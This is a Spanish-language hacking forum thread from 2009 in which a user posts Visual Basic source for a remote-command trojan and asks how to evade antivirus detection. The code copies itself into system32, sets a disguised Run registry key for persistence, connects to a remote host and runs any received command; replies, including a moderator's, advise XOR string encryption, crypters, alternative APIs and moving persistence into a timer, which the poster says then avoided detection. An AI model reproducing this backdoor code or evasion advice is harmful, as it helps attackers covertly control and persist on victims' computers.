elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
24 Mayo 2012, 16:24  


Tema destacado: Suscripción al boletín mensual de elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Karcrack, [Zero])
| | |-+  programa en vb detectado por av
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: programa en vb detectado por av  (Leído 2,969 veces)
50l3r


Desconectado Desconectado

Mensajes: 758


Todo lo que se por la cuarta parte que desconozco


Ver Perfil WWW
programa en vb detectado por av
« en: 17 Mayo 2009, 14:17 »

veran, he estado realizando un troyano el cual ejecuta funciones shell() remotamente, osease, una shell remota

pero me he dado con un canto en los dientes cuando he visto esto:



Detectado? si acaba de salir del horno, como puedo arreglar eso?

el server del troyano es el que esta siendo analizado, lo compile con la libreria del winsock en rar haciendo un fichero compilado y que el server mandase al .ocx que se moviese en system32

digo esto por si fuese el motivo por el cual mi reciente malware es detectado

gracias :)
En línea

Karcrack
Moderador
***
Desconectado Desconectado

Mensajes: 2.190


Se siente observado ¬¬'


Ver Perfil
Re: programa en vb detectado por av
« Respuesta #1 en: 17 Mayo 2009, 15:35 »

veran, he estado realizando un troyano el cual ejecuta funciones shell() remotamente, osease, una shell remota
Eso no es un Shell Remota...

Podrías probar a cifrar las cadenas de tu proyecto:
Citar

También puedes probar a crear PIPES o usar APIs para hacer lo que haces Shell() por ejemplo WinExec/CreateProcess

Saludos ;)
En línea

50l3r


Desconectado Desconectado

Mensajes: 758


Todo lo que se por la cuarta parte que desconozco


Ver Perfil WWW
Re: programa en vb detectado por av
« Respuesta #2 en: 17 Mayo 2009, 16:19 »

wow, buen programa, lo voy a usar haber

igual si que funcionaba con apis pero lo malo es que aun no controlo muy bien las apis


a una pregunta, como catalogarias el software este? yo pense que seria shell remota


----
edito

probe tu programa, puse mi proyecto, lo abri y tenia un modulo mas me parece e hize el .exe pero aun asi el nod me lo detectaba como heuristica

cuales son mis posibilidades ahora?  :-\
« Última modificación: 17 Mayo 2009, 16:26 por 50l3r » En línea

braulio--
Wiki

Desconectado Desconectado

Mensajes: 889


Imagen recursiva


Ver Perfil WWW
Re: programa en vb detectado por av
« Respuesta #3 en: 17 Mayo 2009, 16:47 »

Puedes usar el nuevo cactus metamorph que ha hecho hacker_zero para ver si funciona o el cactus ofuscator de mad antrax.
En línea

~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.983


Ver Perfil WWW
Re: programa en vb detectado por av
« Respuesta #4 en: 17 Mayo 2009, 16:49 »

Sin ver el código dificil decirte, pero seguro que en el form_load haces que se añada al registro y de más, prueba a ponerlo en un timer y da más datos del código...
En línea
50l3r


Desconectado Desconectado

Mensajes: 758


Todo lo que se por la cuarta parte que desconozco


Ver Perfil WWW
Re: programa en vb detectado por av
« Respuesta #5 en: 17 Mayo 2009, 16:55 »

aqui pongo el code:


Código:
Private Sub cmdconectar_Click()
On Error GoTo error
If Not wsk.State = 7 Then GoTo puente
GoTo error
puente:
wsk.Close
wsk.Connect
error:
End Sub

Public Sub Form_Load()
Dim ejec As String

Dim win, sys, residencia
On Error Resume Next

wsk.Protocol = sckTCPProtocol
wsk.RemoteHost = "----------"
wsk.RemotePort = "666"
ejec = App.Path

If Right(ejec, 1) <> "\" Then ejec = ejec & "\"
ejec = ejec & App.EXEName & ".exe"

Set obj = CreateObject("Scripting.FileSystemObject")
Set win = obj.GetSpecialFolder(0)
Set sys = obj.GetSpecialFolder(1)


win = LCase(win)

sys = LCase(sys)
If Dir(sys & "\hole.exe", vbArchive) Then Kill sys & "\hole.exe"
FileCopy ejec, sys & "\hole"
Name sys & "\hole" As sys & "\hole.exe"

Set residencia = CreateObject("WScript.Shell")

[color=red][b]residencia.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "ctfmon", sys & "\hole.exe"[/b][/color]

End Sub

Private Sub Timer1_Timer()
On Error GoTo error
If Not wsk.State = 7 Then Call cmdconectar_Click
error:
End Sub
Private Sub wsk_DataArrival(ByVal bytesTotal As Long)
Dim orden As String
On Error GoTo error
wsk.GetData orden
Shell orden
error:
End Sub


si, en el form, se añade al registro, le he quitado la funcion taskvisibla false porque eso tambien sera detectado

y si en  vez de añadirlo al registro lo copio en la carpeta inicio de allusers?
En línea

~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.983


Ver Perfil WWW
Re: programa en vb detectado por av
« Respuesta #6 en: 17 Mayo 2009, 17:02 »

Cambia ese código a un timer
En línea
XcryptOR

Desconectado Desconectado

Mensajes: 225



Ver Perfil
Re: programa en vb detectado por av
« Respuesta #7 en: 17 Mayo 2009, 17:15 »

cifra las cadenas, sin hacerlo jamas dejaran de detectar tu troyano, usa un asimple cifrado XOR eso basta para la mayoria, digo todos los que conozco
En línea



50l3r


Desconectado Desconectado

Mensajes: 758


Todo lo que se por la cuarta parte que desconozco


Ver Perfil WWW
Re: programa en vb detectado por av
« Respuesta #8 en: 17 Mayo 2009, 17:47 »

lo que hice fue meter la orden de clave de registro en un timer, al parecer era eso, ahora hata va mejor porque si eliminas la clave se regenera cada 1 segundo  :laugh:

muchas gracias
En línea

Karcrack
Moderador
***
Desconectado Desconectado

Mensajes: 2.190


Se siente observado ¬¬'


Ver Perfil
Re: programa en vb detectado por av
« Respuesta #9 en: 17 Mayo 2009, 18:30 »

Puedes usar el nuevo cactus metamorph que ha hecho hacker_zero para ver si funciona o el cactus ofuscator de mad antrax.
Hacker_Zero no ha codeado un Cactus Metamoph :¬¬ :¬¬
Si te has leído bien el post que ha hecho Hacker_Zero sabrás que todavía no funciona correctamente con ejecutables de VB y Delphi....



Por lo visto el problema es que haces todo lo 'malo' en Form_Load creo que te lo hubieras podido saltar cambiandolo a Form_Initialize...

De todas formas te viene mejor para la persistencia lo del Timer ;D

a una pregunta, como catalogarias el software este? yo pense que seria shell remota

Yo le llamaría  Ejecutador Remoto :xD, ya que hace lo mismo que el [INICIO] + [R] :xD :xD

Saludos ;D
« Última modificación: 17 Mayo 2009, 18:32 por Karcrack » En línea

braulio--
Wiki

Desconectado Desconectado

Mensajes: 889


Imagen recursiva


Ver Perfil WWW
Re: programa en vb detectado por av
« Respuesta #10 en: 17 Mayo 2009, 18:57 »

Puedes usar el nuevo cactus metamorph que ha hecho hacker_zero para ver si funciona o el cactus ofuscator de mad antrax.
Hacker_Zero no ha codeado un Cactus Metamoph :¬¬ :¬¬
Si te has leído bien el post que ha hecho Hacker_Zero sabrás que todavía no funciona correctamente con ejecutables de VB y Delphi....

Sorry, quise decir virus metamorph
En línea

50l3r


Desconectado Desconectado

Mensajes: 758


Todo lo que se por la cuarta parte que desconozco


Ver Perfil WWW
Re: programa en vb detectado por av
« Respuesta #11 en: 17 Mayo 2009, 22:50 »

omg, ejecutador remoto, me gusta  :xD

lo malo es que como esta la cosa, faltan conocimientos de vb aun no puedo ver las salidas de la cmd

 :-\ ains
En línea

Karcrack
Moderador
***
Desconectado Desconectado

Mensajes: 2.190


Se siente observado ¬¬'


Ver Perfil
Re: programa en vb detectado por av
« Respuesta #12 en: 17 Mayo 2009, 23:26 »

omg, ejecutador remoto, me gusta  :xD

lo malo es que como esta la cosa, faltan conocimientos de vb aun no puedo ver las salidas de la cmd

 :-\ ains
Tranquilo hombre, nadie nace sabiendo (Aunque algunos piensen que ellos si :¬¬ :¬¬)

Revisa este code de Cobein ;):
Citar
:http://foro.elhacker.net/programacion_vb/jugaba_a_que_hacia_un_troyano_source-t211260.0.html
En línea

~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.983


Ver Perfil WWW
Re: programa en vb detectado por av
« Respuesta #13 en: 18 Mayo 2009, 00:22 »

O también puedes poner timer.enable = false (creo que era así que hace que no toco VB como un año) y así no estás copiando lo mismo al registro todo el rato...

Más que nada por que algunos AV's (como el KAV) muestran un mensajito de aceptar/rechazar cada vez que se copia al registro y sería bastante sospechoso...
En línea
50l3r


Desconectado Desconectado

Mensajes: 758


Todo lo que se por la cuarta parte que desconozco


Ver Perfil WWW
Re: programa en vb detectado por av
« Respuesta #14 en: 18 Mayo 2009, 00:37 »

um, tienes razon, me pasa lo mismo con el proceso teatimer del sybot sd

um pues tendre que quitarlo, gracias por la informacion
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines